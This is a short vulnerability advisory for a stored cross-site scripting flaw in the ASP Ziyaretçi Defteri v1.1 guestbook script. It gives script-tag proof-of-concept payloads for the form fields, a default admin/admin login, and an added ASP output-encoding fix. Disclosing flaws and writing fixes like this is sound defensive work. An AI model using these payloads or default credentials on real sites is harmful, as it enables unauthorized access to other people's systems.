ASP Ziyaretçi Defteri version 1.1 suffers from a cross-site scripting vulnerability.
ASP Ziyaretçi Defteri v1.1 (tr) XSS Vulnerability
#Software: ASP Ziyaretçi Defteri v1.1 (tr)
#download: http://www.aspindir.com/goster/4882
#demo: http://www.hiddenchest.com/kodlarim/ziyaret/
#Found By: GeFORC3 ( G3 )
#Exploit:
1- http://www.example.com/ziyaret/mesaj_formu.asp
Isim: <script>alert("G3");</script>
E-posta: <script>alert("G3");</script>
Mesajiniz: <script>alert("G3");</script>
Press the "Gönder" (send) button.
2- Yönetici paneli (admin panel):
http://www.example.com/ziyaret/default.asp (default user: admin, pass: admin)
Press the "gir" button.
http://www.example.com/default.asp?islem=login --> the XSS code runs
This XSS works in the Yönetici Paneli (admin panel) of the ASP Ziyaretçi Defteri v1.1 (tr) script.
If the admin approves (activates) your message, the XSS code runs on the guestbook's main page (http://example.com/ziyaret/ziyaretci_mesajlari.asp).
WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com
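Mitigation sketch (an added example, not code from the application or from the advisory's author): the stored values are HTML-encoded at output time through one shared routine, so the admin panel and the public message page both receive them as inert text. The dictionary keys `isim`, `eposta`, `mesaj`, the helper names and the length limits are assumptions made for illustration.

```asp
<%
' Added example, not the application's code. The field names (isim, eposta,
' mesaj), helper names and the sample entry are constructed for illustration.

' Encode any stored value for an HTML text context; Null/Empty becomes "".
Function H(v)
    If IsNull(v) Or IsEmpty(v) Then
        H = ""
    Else
        H = Server.HTMLEncode(CStr(v))
    End If
End Function

' Trim and cap a submitted field before it is stored. This limits abuse
' but is not the XSS fix; encoding on output is.
Function CleanField(v, maxLen)
    CleanField = Left(Trim(v & ""), maxLen)
End Function

' Render one guestbook entry. Call this from both the admin list and the
' public page so neither view writes stored input to the response raw.
Sub RenderEntry(entry)
    Response.Write "<div class=""mesaj"">"
    Response.Write "<b>" & H(entry("isim")) & "</b> "
    Response.Write "(" & H(entry("eposta")) & ")<br>"
    ' Keep line breaks readable: encode first, then add <br> tags.
    Response.Write Replace(H(entry("mesaj")), vbCrLf, "<br>")
    Response.Write "</div>"
End Sub

' Constructed sample entry carrying the advisory's test string.
Dim entry
Set entry = Server.CreateObject("Scripting.Dictionary")
entry.Add "isim",   CleanField("<script>alert(""G3"");</script>", 50)
entry.Add "eposta", CleanField("<script>alert(""G3"");</script>", 100)
entry.Add "mesaj",  CleanField("<script>alert(""G3"");</script>", 2000)

' Unencoded pattern that produces the behaviour described above:
'   Response.Write entry("isim")
' Hardened: the browser receives &lt;script&gt;... and displays it as text.
RenderEntry entry
%>
```

The default admin/admin login mentioned in step 2 is a separate weakness and should be changed at install time regardless of the encoding fix.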